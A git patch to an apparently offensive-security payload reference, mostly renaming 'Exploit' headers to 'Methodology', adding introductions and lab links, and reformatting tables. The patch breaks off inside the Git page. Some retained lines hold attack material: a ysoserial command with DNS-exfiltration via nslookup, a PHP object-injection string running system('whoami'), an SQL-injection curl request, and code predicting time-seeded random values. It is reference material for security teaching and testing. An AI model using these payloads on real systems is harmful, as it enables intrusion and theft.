From 2304101657e7b522a3decd3e570ceb60e10fbbd8 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 10 Nov 2024 14:37:48 +0100
Subject: [PATCH] Normalize page header for GraphQL, Deserialization, SCM
---
Google Web Toolkit/README.md | 8 +-
GraphQL Injection/README.md | 18 ++-
Headless Browser/README.md | 15 ++-
Hidden Parameters/README.md | 13 +-
Insecure Deserialization/DotNET.md | 5 +-
Insecure Deserialization/Java.md | 112 +++++++++---------
Insecure Deserialization/Node.md | 9 +-
Insecure Deserialization/PHP.md | 21 ++--
Insecure Deserialization/Python.md | 2 +
Insecure Deserialization/README.md | 14 ++-
Insecure Deserialization/Ruby.md | 5 +
Insecure Deserialization/YAML.md | 8 +-
Insecure Direct Object References/README.md | 18 +--
Insecure Management Interface/README.md | 7 ++
Insecure Randomness/README.md | 49 +++++++-
Insecure Source Code Management/Bazaar.md | 3 +
Insecure Source Code Management/Git.md | 32 ++---
Insecure Source Code Management/Mercurial.md | 3 +
Insecure Source Code Management/README.md | 11 +-
Insecure Source Code Management/Subversion.md | 26 ++--
Java RMI/README.md | 12 +-
21 files changed, 262 insertions(+), 129 deletions(-)
diff --git a/Google Web Toolkit/README.md b/Google Web Toolkit/README.md
index da42cf69..42cccb90 100644
--- a/Google Web Toolkit/README.md
+++ b/Google Web Toolkit/README.md
@@ -6,17 +6,17 @@
## Summary
* [Tools](#tools)
-* [Enumerate](#enumerate)
+* [Methodology](#methodology)
* [References](#references)
## Tools
-* [FSecureLABS/GWTMap](https://github.com/FSecureLABS/GWTMap)
-* [GDSSecurity/GWT-Penetration-Testing-Toolset](https://github.com/GDSSecurity/GWT-Penetration-Testing-Toolset)
+* [FSecureLABS/GWTMap](https://github.com/FSecureLABS/GWTMap) - GWTMap is a tool to help map the attack surface of Google Web Toolkit (GWT) based applications.
+* [GDSSecurity/GWT-Penetration-Testing-Toolset](https://github.com/GDSSecurity/GWT-Penetration-Testing-Toolset) - A set of tools made to assist in penetration testing GWT applications.
-## Enumerate
+## Methodology
* Enumerate the methods of a remote application via it's bootstrap file and create a local backup of the code (selects permutation at random):
```ps1
diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md
index 73e4c58e..0a51708d 100644
--- a/GraphQL Injection/README.md
+++ b/GraphQL Injection/README.md
@@ -13,7 +13,7 @@
- [Enumerate Database Schema via Suggestions](#enumerate-database-schema-via-suggestions)
- [Enumerate the types' definition](#enumerate-the-types-definition)
- [List path to reach a type](#list-path-to-reach-a-type)
-- [Exploit](#exploit)
+- [Methodology](#methodology)
- [Extract data](#extract-data)
- [Extract data using edges/nodes](#extract-data-using-edgesnodes)
- [Extract data using projections](#extract-data-using-projections)
@@ -24,6 +24,7 @@
- [Injections](#injections)
- [NOSQL injection](#nosql-injection)
- [SQL injection](#sql-injection)
+- [Labs](#labs)
- [References](#references)
@@ -243,7 +244,7 @@ Found 27 ways to reach the "Skill" node from the "Query" node:
```
-## Exploit
+## Methodology
### Extract data
@@ -384,6 +385,19 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
```
+## Labs
+
+* [PortSwigger - Accessing private GraphQL posts](https://portswigger.net/web-security/graphql/lab-graphql-reading-private-posts)
+* [PortSwigger - Accidental exposure of private GraphQL fields](https://portswigger.net/web-security/graphql/lab-graphql-accidental-field-exposure)
+* [PortSwigger - Finding a hidden GraphQL endpoint](https://portswigger.net/web-security/graphql/lab-graphql-find-the-endpoint)
+* [PortSwigger - Bypassing GraphQL brute force protections](https://portswigger.net/web-security/graphql/lab-graphql-brute-force-protection-bypass)
+* [PortSwigger - Performing CSRF exploits over GraphQL](https://portswigger.net/web-security/graphql/lab-graphql-csrf-via-graphql-api)
+* [Root Me - GraphQL - Introspection](https://www.root-me.org/fr/Challenges/Web-Serveur/GraphQL-Introspection)
+* [Root Me - GraphQL - Injection](https://www.root-me.org/fr/Challenges/Web-Serveur/GraphQL-Injection)
+* [Root Me - GraphQL - Backend injection](https://www.root-me.org/fr/Challenges/Web-Serveur/GraphQL-Backend-injection)
+* [Root Me - GraphQL - Mutation](https://www.root-me.org/fr/Challenges/Web-Serveur/GraphQL-Mutation)
+
+
## References
- [Building a free open source GraphQL wordlist for penetration testing - Nohé Hinniger-Foray - August 17, 2023](https://escape.tech/blog/graphql-security-wordlist/)
diff --git a/Headless Browser/README.md b/Headless Browser/README.md
index c3d5dc18..14d15570 100644
--- a/Headless Browser/README.md
+++ b/Headless Browser/README.md
@@ -1,8 +1,19 @@
# Headless Browser
-A headless browser is a web browser without a graphical user interface. It works just like a regular browser, such as Chrome or Firefox, by interpreting HTML, CSS, and JavaScript, but it does so in the background, without displaying any visuals.
+> A headless browser is a web browser without a graphical user interface. It works just like a regular browser, such as Chrome or Firefox, by interpreting HTML, CSS, and JavaScript, but it does so in the background, without displaying any visuals.
-Headless browsers are primarily used for automated tasks, such as web scraping, testing, and running scripts. They are particularly useful in situations where a full-fledged browser is not needed, or where resources (like memory or CPU) are limited.
+> Headless browsers are primarily used for automated tasks, such as web scraping, testing, and running scripts. They are particularly useful in situations where a full-fledged browser is not needed, or where resources (like memory or CPU) are limited.
+
+
+## Summary
+
+* [Headless Commands](#headless-commands)
+* [Local File Read](#local-file-read)
+* [Debugging Port ](#debugging-port)
+* [Network](#network)
+ * [Port Scanning](#port-scanning)
+ * [DNS Rebinding](#dns-rebinding)
+* [References](#references)
## Headless Commands
diff --git a/Hidden Parameters/README.md b/Hidden Parameters/README.md
index 86b8be8c..b52e5e04 100644
--- a/Hidden Parameters/README.md
+++ b/Hidden Parameters/README.md
@@ -2,12 +2,13 @@
> Web applications often have hidden or undocumented parameters that are not exposed in the user interface. Fuzzing can help discover these parameters, which might be vulnerable to various attacks.
+
## Summary
* [Tools](#tools)
-* [Exploit](#exploit)
- * [Bruteforce parameters](#bruteforce-parameters)
- * [Old parameters](#old-parameters)
+* [Methodology](#methodology)
+ * [Bruteforce Parameters](#bruteforce-parameters)
+ * [Old Parameters](#old-parameters)
* [References](#references)
@@ -20,9 +21,9 @@
* [devanshbatham/ParamSpider](https://github.com/devanshbatham/ParamSpider) - Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing
-## Exploit
+## Methodology
-### Bruteforce parameters
+### Bruteforce Parameters
* Use wordlists of common parameters and send them, look for unexpected behavior from the backend.
```ps1
@@ -39,7 +40,7 @@ Wordlist examples:
- [samlists/sam-cc-parameters-mixedcase-all.txt](https://github.com/the-xentropy/samlists/blob/main/sam-cc-parameters-mixedcase-all.txt)
-### Old parameters
+### Old Parameters
Explore all the URL from your targets to find old parameters.
diff --git a/Insecure Deserialization/DotNET.md b/Insecure Deserialization/DotNET.md
index 08edf5e0..ac2f3c1c 100644
--- a/Insecure Deserialization/DotNET.md
+++ b/Insecure Deserialization/DotNET.md
@@ -1,4 +1,7 @@
-# .NET Serialization
+# .NET Deserialization
+
+> .NET serialization is the process of converting an object’s state into a format that can be easily stored or transmitted, such as XML, JSON, or binary. This serialized data can then be saved to a file, sent over a network, or stored in a database. Later, it can be deserialized to reconstruct the original object with its data intact. Serialization is widely used in .NET for tasks like caching, data transfer between applications, and session state management.
+
## Summary
diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md
index 16bdc9d2..4aadd0de 100644
--- a/Insecure Deserialization/Java.md
+++ b/Insecure Deserialization/Java.md
@@ -1,5 +1,8 @@
# Java Deserialization
+> Java serialization is the process of converting a Java object’s state into a byte stream, which can be stored or transmitted and later reconstructed (deserialized) back into the original object. Serialization in Java is primarily done using the `Serializable` interface, which marks a class as serializable, allowing it to be saved to files, sent over a network, or transferred between JVMs.
+
+
## Summary
* [Detection](#detection)
@@ -19,6 +22,7 @@
- Content-type = "application/x-java-serialized-object"
- `"H4sIAAAAAAAAAJ"` in gzip(base64)
+
## Tools
### Ysoserial
@@ -33,44 +37,44 @@ java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | b
```
**List of payloads included in ysoserial:**
-```ps1
-Payload Authors Dependencies
-------- ------- ------------
-AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
-BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
-C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
-Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
-Clojure @JackOfMostTrades clojure:1.8.0
-CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
-CommonsCollections1 @frohoff commons-collections:3.1
-CommonsCollections2 @frohoff commons-collections4:4.0
-CommonsCollections3 @frohoff commons-collections:3.1
-CommonsCollections4 @frohoff commons-collections4:4.0
-CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
-CommonsCollections6 @matthias_kaiser commons-collections:3.1
-CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
-FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
-Groovy1 @frohoff groovy:2.3.9
-Hibernate1 @mbechler
-Hibernate2 @mbechler
-JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
-JRMPClient @mbechler
-JRMPListener @mbechler
-JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
-JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
-Jdk7u21 @frohoff
-Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
-MozillaRhino1 @matthias_kaiser js:1.7R2
-MozillaRhino2 @_tint0 js:1.7R2
-Myfaces1 @mbechler
-Myfaces2 @mbechler
-ROME @mbechler rome:1.0
-Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
-Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
-URLDNS @gebl
-Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
-Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
-```
+
+| Payload | Authors | Dependencies |
+| ------------------- | -------------------------------------- | --- |
+| AspectJWeaver | @Jang | aspectjweaver:1.9.2, commons-collections:3.2.2 |
+| BeanShell1 | @pwntester, @cschneider4711 | bsh:2.0b5 |
+| C3P0 | @mbechler | c3p0:0.9.5.2, mchange-commons-java:0.2.11 |
+| Click1 | @artsploit | click-nodeps:2.3.0, javax.servlet-api:3.1.0 |
+| Clojure | @JackOfMostTrades | clojure:1.8.0 |
+| CommonsBeanutils1 | @frohoff | commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 |
+| CommonsCollections1 | @frohoff | commons-collections:3.1 |
+| CommonsCollections2 | @frohoff | commons-collections4:4.0 |
+| CommonsCollections3 | @frohoff | commons-collections:3.1 |
+| CommonsCollections4 | @frohoff | commons-collections4:4.0 |
+| CommonsCollections5 | @matthias_kaiser, @jasinner | commons-collections:3.1 |
+| CommonsCollections6 | @matthias_kaiser | commons-collections:3.1 |
+| CommonsCollections7 | @scristalli, @hanyrax, @EdoardoVignati | commons-collections:3.1 |
+| FileUpload1 | @mbechler | commons-fileupload:1.3.1, commons-io:2.4|
+| Groovy1 | @frohoff | groovy:2.3.9 |
+| Hibernate1 | @mbechler | |
+| Hibernate2 | @mbechler | |
+| JBossInterceptors1 | @matthias_kaiser | javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 |
+| JRMPClient | @mbechler | |
+| JRMPListener | @mbechler | |
+| JSON1 | @mbechler | json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 |
+| JavassistWeld1 | @matthias_kaiser | javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 |
+| Jdk7u21 | @frohoff | |
+| Jython1 | @pwntester, @cschneider4711 | jython-standalone:2.5.2 |
+| MozillaRhino1 | @matthias_kaiser | js:1.7R2 |
+| MozillaRhino2 | @_tint0 | js:1.7R2 |
+| Myfaces1 | @mbechler | |
+| Myfaces2 | @mbechler | |
+| ROME | @mbechler | rome:1.0 |
+| Spring1 | @frohoff | spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE |
+| Spring2 | @mbechler | spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 |
+| URLDNS | @gebl | |
+| Vaadin1 | @kai_ullrich | vaadin-server:7.7.14, vaadin-shared:7.7.14 |
+| Wicket1 | @jacob-baines | wicket-util:6.23.0, slf4j-api:1.6.4 |
+
### Burp extensions
@@ -108,23 +112,23 @@ Wicket1 @jacob-baines wicket-util:6.23.0, s
// arguments - Gadget specific arguments
```
-Payload generators for the following marshallers are included:
+Payload generators for the following marshallers are included:
-| Marshaller | Gadget Impact
-| ------------------------------- | ----------------------------------------------
-| BlazeDSAMF(0|3|X) | JDK only escalation to Java serialization
various third party libraries RCEs
-| Hessian|Burlap | various third party RCEs
-| Castor | dependency library RCE
-| Jackson | **possible JDK only RCE**, various third party RCEs
-| Java | yet another third party RCE
-| JsonIO | **JDK only RCE**
-| JYAML | **JDK only RCE**
-| Kryo | third party RCEs
-| KryoAltStrategy | **JDK only RCE**
-| Red5AMF(0|3) | **JDK only RCE**
-| SnakeYAML | **JDK only RCEs**
-| XStream | **JDK only RCEs**
-| YAMLBeans | third party RCE
+| Marshaller | Gadget Impact |
+| ------------------------------- | ---------------------------------------------- |
+| BlazeDSAMF(0|3|X) | JDK only escalation to Java serialization various third party libraries RCEs |
+| Hessian|Burlap | various third party RCEs |
+| Castor | dependency library RCE |
+| Jackson | **possible JDK only RCE**, various third party RCEs |
+| Java | yet another third party RCE |
+| JsonIO | **JDK only RCE** |
+| JYAML | **JDK only RCE** |
+| Kryo | third party RCEs |
+| KryoAltStrategy | **JDK only RCE** |
+| Red5AMF(0|3) | **JDK only RCE** |
+| SnakeYAML | **JDK only RCEs** |
+| XStream | **JDK only RCEs** |
+| YAMLBeans | third party RCE |
## References
diff --git a/Insecure Deserialization/Node.md b/Insecure Deserialization/Node.md
index 5330a8e3..a58dc8a5 100644
--- a/Insecure Deserialization/Node.md
+++ b/Insecure Deserialization/Node.md
@@ -1,14 +1,17 @@
# Node Deserialization
+> Node.js deserialization refers to the process of reconstructing JavaScript objects from a serialized format, such as JSON, BSON, or other formats that represent structured data. In Node.js applications, serialization and deserialization are commonly used for data storage, caching, and inter-process communication.
+
+
## Summary
-* [Exploit](#exploit)
+* [Methodology](#methodology)
* [node-serialize](#node-serialize)
* [funcster](#funcster)
* [References](#references)
-## Exploit
+## Methodology
* In Node source code, look for:
* `node-serialize`
@@ -47,6 +50,6 @@
## References
-- [CVE-2017-5941 - NATIONAL VULNERABILITY DATABASE - February 9, 2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
+- [CVE-2017-5941 - National Vulnerability Database - February 9, 2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
- [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham - October 31, 2018](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
- [NodeJS Deserialization - gonczor - January 8, 2020](https://blacksheephacks.pl/nodejs-deserialization/)
\ No newline at end of file
diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md
index 754ae940..c9c7f16f 100644
--- a/Insecure Deserialization/PHP.md
+++ b/Insecure Deserialization/PHP.md
@@ -1,20 +1,20 @@
# PHP Deserialization
-PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
+> PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
## Summary
-* [General concept](#general-concept)
-* [Authentication bypass](#authentication-bypass)
+* [General Concept](#general-concept)
+* [Authentication Bypass](#authentication-bypass)
* [Object Injection](#object-injection)
-* [Finding and using gadgets](#finding-and-using-gadgets)
+* [Finding and Using Gadgets](#finding-and-using-gadgets)
* [Phar Deserialization](#phar-deserialization)
-* [Real world examples](#real-world-examples)
+* [Real World Examples](#real-world-examples)
* [References](#references)
-## General concept
+## General Concept
The following magic methods will help you for a PHP Object injection
@@ -62,9 +62,10 @@ a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}"
```
-## Authentication bypass
-### Type juggling
+## Authentication Bypass
+
+### Type Juggling
Vulnerable code:
@@ -123,7 +124,7 @@ a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
```
-## Finding and using gadgets
+## Finding and Using Gadgets
Also called `"PHP POP Chains"`, they can be used to gain RCE on the system.
@@ -236,7 +237,7 @@ A valid PHAR includes four elements:
```
-## Real world examples
+## Real World Examples
* [Vanilla Forums ImportController index file_exists Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410237)
* [Vanilla Forums Xenforo password splitHash Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410212)
diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md
index c348bbe6..385c9beb 100644
--- a/Insecure Deserialization/Python.md
+++ b/Insecure Deserialization/Python.md
@@ -1,5 +1,7 @@
# Python Deserialization
+> Python deserialization is the process of reconstructing Python objects from serialized data, commonly done using formats like JSON, pickle, or YAML. The pickle module is a frequently used tool for this in Python, as it can serialize and deserialize complex Python objects, including custom classes.
+
## Summary
* [Detection](#detection)
diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md
index 19685cf8..6ded41ba 100644
--- a/Insecure Deserialization/README.md
+++ b/Insecure Deserialization/README.md
@@ -2,6 +2,7 @@
> Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications. Deserialization is the reverse of that process -- taking data structured from some format, and rebuilding it into an object - OWASP
+
## Summary
* [Deserialization Identifier](#deserialization-identifier)
@@ -42,8 +43,17 @@ POP gadgets characteristics:
## Labs
-* [Portswigger - Insecure Deserialization](https://portswigger.net/web-security/all-labs#insecure-deserialization)
-* [NickstaDB/DeserLab - Java deserialization exploitation lab](https://github.com/NickstaDB/DeserLab)
+* [PortSwigger - Modifying serialized objects](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-objects)
+* [PortSwigger - Modifying serialized data types](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-data-types)
+* [PortSwigger - Using application functionality to exploit insecure deserialization](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-using-application-functionality-to-exploit-insecure-deserialization)
+* [PortSwigger - Arbitrary object injection in PHP](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-arbitrary-object-injection-in-php)
+* [PortSwigger - Exploiting Java deserialization with Apache Commons](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-java-deserialization-with-apache-commons)
+* [PortSwigger - Exploiting PHP deserialization with a pre-built gadget chain](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-php-deserialization-with-a-pre-built-gadget-chain)
+* [PortSwigger - Exploiting Ruby deserialization using a documented gadget chain](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-ruby-deserialization-using-a-documented-gadget-chain)
+* [PortSwigger - Developing a custom gadget chain for Java deserialization](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-developing-a-custom-gadget-chain-for-java-deserialization)
+* [PortSwigger - Developing a custom gadget chain for PHP deserialization](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-developing-a-custom-gadget-chain-for-php-deserialization)
+* [PortSwigger - Using PHAR deserialization to deploy a custom gadget chain](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-using-phar-deserialization-to-deploy-a-custom-gadget-chain)
+* [NickstaDB - DeserLab](https://github.com/NickstaDB/DeserLab)
## References
diff --git a/Insecure Deserialization/Ruby.md b/Insecure Deserialization/Ruby.md
index 75239679..f81c1a4e 100644
--- a/Insecure Deserialization/Ruby.md
+++ b/Insecure Deserialization/Ruby.md
@@ -1,5 +1,8 @@
# Ruby Deserialization
+> Ruby deserialization is the process of converting serialized data back into Ruby objects, often using formats like YAML, Marshal, or JSON. Ruby's Marshal module, for instance, is commonly used for this, as it can serialize and deserialize complex Ruby objects.
+
+
## Summary
* [Marshal.load](#marshalload)
@@ -18,12 +21,14 @@ for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1
## Yaml.load
Vulnerable code
+
```ruby
require "yaml"
YAML.load(File.read("p.yml"))
```
Universal gadget for ruby <= 2.7.2:
+
```ruby
--- !ruby/object:Gem::Requirement
requirements:
diff --git a/Insecure Deserialization/YAML.md b/Insecure Deserialization/YAML.md
index 55440580..479aed68 100644
--- a/Insecure Deserialization/YAML.md
+++ b/Insecure Deserialization/YAML.md
@@ -1,15 +1,19 @@
# YAML Deserialization
+> YAML deserialization is the process of converting YAML-formatted data back into objects in programming languages like Python, Ruby, or Java. YAML (YAML Ain't Markup Language) is popular for configuration files and data serialization because it is human-readable and supports complex data structures.
+
+
## Summary
* [Tools](#tools)
-* [Exploit](#exploit)
+* [Methodology](#methodology)
* [PyYAML](#pyyaml)
* [ruamel.yaml](#ruamelyaml)
* [Ruby](#ruby)
* [SnakeYAML](#snakeyaml)
* [References](#references)
+
## Tools
* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)
@@ -17,7 +21,7 @@
* [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - Java Unmarshaller Security - Turning your data into code execution
-## Exploit
+## Methodology
### PyYAML
diff --git a/Insecure Direct Object References/README.md b/Insecure Direct Object References/README.md
index cba097d3..306ee3cd 100644
--- a/Insecure Direct Object References/README.md
+++ b/Insecure Direct Object References/README.md
@@ -1,19 +1,19 @@
# Insecure Direct Object References
-> Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files. - OWASP
+> Insecure Direct Object References (IDOR) is a security vulnerability that occurs when an application allows users to directly access or modify objects (such as files, database records, or URLs) based on user-supplied input, without sufficient access controls. This means that if a user changes a parameter value (like an ID) in a URL or API request, they might be able to access or manipulate data that they aren’t authorized to see or modify.
## Summary
* [Tools](#tools)
-* [Labs](#labs)
-* [Exploit](#exploit)
+* [Methodology](#methodology)
* [Numeric Value Parameter](#numeric-value-parameter)
* [Common Identifiers Parameter](#common-identifiers-parameter)
* [Weak Pseudo Random Number Generator](#weak-pseudo-random-number-generator)
* [Hashed Parameter](#hashed-parameter)
* [Wildcard Parameter](#wildcard-parameter)
* [IDOR Tips](#idor-tips)
+* [Labs](#labs)
* [References](#references)
@@ -24,12 +24,7 @@
- [PortSwigger/BApp Store > Autorize](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f)
-## Labs
-
-- [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
-
-
-## Exploit
+## Methodology
IDOR stands for Insecure Direct Object Reference. It's a type of security vulnerability that arises when an application provides direct access to objects based on user-supplied input. As a result, attackers can bypass authorization and access resources in the system directly, potentially leading to unauthorized information disclosure, modification, or deletion.
@@ -130,6 +125,11 @@ Send a wildcard (`*`, `%`, `.`, `_`) instead of an ID, some backend might respon
* Use Parameter Pollution: `user_id=hacker_id&user_id=victim_id`
+## Labs
+
+- [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
+
+
## References
- [From Christmas present in the blockchain to massive bug bounty - Jesse Lakerveld - March 21, 2018](http://web.archive.org/web/20180401130129/https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
diff --git a/Insecure Management Interface/README.md b/Insecure Management Interface/README.md
index 8f8cdf9b..383c709c 100644
--- a/Insecure Management Interface/README.md
+++ b/Insecure Management Interface/README.md
@@ -1,5 +1,10 @@
# Insecure Management Interface
+> Insecure Management Interface refers to vulnerabilities in administrative interfaces used for managing servers, applications, databases, or network devices. These interfaces often control sensitive settings and can have powerful access to system configurations, making them prime targets for attackers.
+
+> Insecure Management Interfaces may lack proper security measures, such as strong authentication, encryption, or IP restrictions, allowing unauthorized users to potentially gain control over critical systems. Common issues include using default credentials, unencrypted communications, or exposing the interface to the public internet.
+
+
## Summary
* [Springboot-Actuator](#springboot-actuator)
@@ -27,12 +32,14 @@ Note: Sensitive endpoints will require a username/password when they are accesse
Since Springboot 2.X only `/health` and `/info` are enabled by default.
+
### Remote Code Execution via `/env`
Spring is able to load external configurations in the YAML format.
The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks.
In other words, an attacker can gain remote code execution by loading a malicious config file.
+
#### Steps
1. Generate a payload of SnakeYAML deserialization gadget.
diff --git a/Insecure Randomness/README.md b/Insecure Randomness/README.md
index 6a8cc011..0fd533fa 100644
--- a/Insecure Randomness/README.md
+++ b/Insecure Randomness/README.md
@@ -1,16 +1,55 @@
# Insecure Randomness
+> Insecure randomness refers to the weaknesses associated with random number generation in computing, particularly when such randomness is used for security-critical purposes. Vulnerabilities in random number generators (RNGs) can lead to predictable outputs that can be exploited by attackers, resulting in potential data breaches or unauthorized access.
+
+
## Summary
+* [Methodology](#methodology)
+* [Time-Based Seeds](#time-based-seeds)
* [GUID / UUID](#guid--uuid)
* [GUID Versions](#guid-versions)
* [Mongo ObjectId](#mongo-objectid)
* [Uniqid](#uniqid)
* [mt_rand](#mt_rand)
-* [Other](#other)
+* [Custom Algorithms](#custom-algorithms)
* [References](#references)
+## Methodology
+
+Insecure randomness arises when the source of randomness or the method of generating random values is not sufficiently unpredictable. This can lead to predictable outputs, which can be exploited by attackers. Below, we examine common methods that are prone to insecure randomness, including time-based seeds, GUIDs, UUIDs, MongoDB ObjectIds, and the `uniqid()` function.
+
+
+## Time-Based Seeds
+
+Many random number generators (RNGs) use the current system time (e.g., milliseconds since epoch) as a seed. This approach can be insecure because the seed value can be easily predicted, especially in automated or scripted environments.
+
+```py
+import random
+import time
+
+seed = int(time.time())
+random.seed(seed)
+print(random.randint(1, 100))
+```
+
+The RNG is seeded with the current time, making it predictable for anyone who knows or can estimate the seed value.
+By knowing the exact time, an attacker can regenerate the correct random value, here is an example for the date `2024-11-10 13:37`.
+
+```python
+import random
+import time
+
+# Seed based on the provided timestamp
+seed = int(time.mktime(time.strptime('2024-11-10 13:37', '%Y-%m-%d %H:%M')))
+random.seed(seed)
+
+# Generate the random number
+print(random.randint(1, 100))
+```
+
+
## GUID / UUID
A GUID (Globally Unique Identifier) or UUID (Universally Unique Identifier) is a 128-bit number used to uniquely identify information in computer systems. They are typically represented as a string of hexadecimal digits, divided into five groups separated by hyphens, such as `550e8400-e29b-41d4-a716-446655440000`. GUIDs/UUIDs are designed to be unique across both space and time, reducing the likelihood of duplication even when generated by different systems or at different times.
@@ -148,13 +187,17 @@ Breaking mt_rand() with two output values and no bruteforce.
```
-## Other
+## Custom Algorithms
-Other bad ideas that are sometimes shipped into production.
+Creating your own randomness algorithm is generally not recommended. Below are some examples found on GitHub or StackOverflow that are sometimes used in production, but may not be reliable or secure.
* `$token = md5($emailId).rand(10,9999);`
* `$token = md5(time()+123456789 % rand(4000, 55000000));`
+
+
+### Tools
+
Generic identification and sandwitch attack:
* [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Insecure time-based secret exploitation and Sandwich attack implementation Resources
diff --git a/Insecure Source Code Management/Bazaar.md b/Insecure Source Code Management/Bazaar.md
index 26a9acab..2b305531 100644
--- a/Insecure Source Code Management/Bazaar.md
+++ b/Insecure Source Code Management/Bazaar.md
@@ -1,5 +1,8 @@
# Bazaar
+> Bazaar (also known as bzr ) is a free, distributed version control system (DVCS) that helps you track project history over time and collaborate seamlessly with others. Developed by Canonical, Bazaar emphasizes ease of use, a flexible workflow, and rich features to cater to both individual developers and large teams.
+
+
## Summary
* [Tools](#tools)
diff --git a/Insecure Source Code Management/Git.md b/Insecure Source Code Management/Git.md
index 327920db..3d29a07b 100644
--- a/Insecure Source Code Management/Git.md
+++ b/Insecure Source Code Management/Git.md
@@ -2,26 +2,26 @@
## Summary
-* [Example](#example)
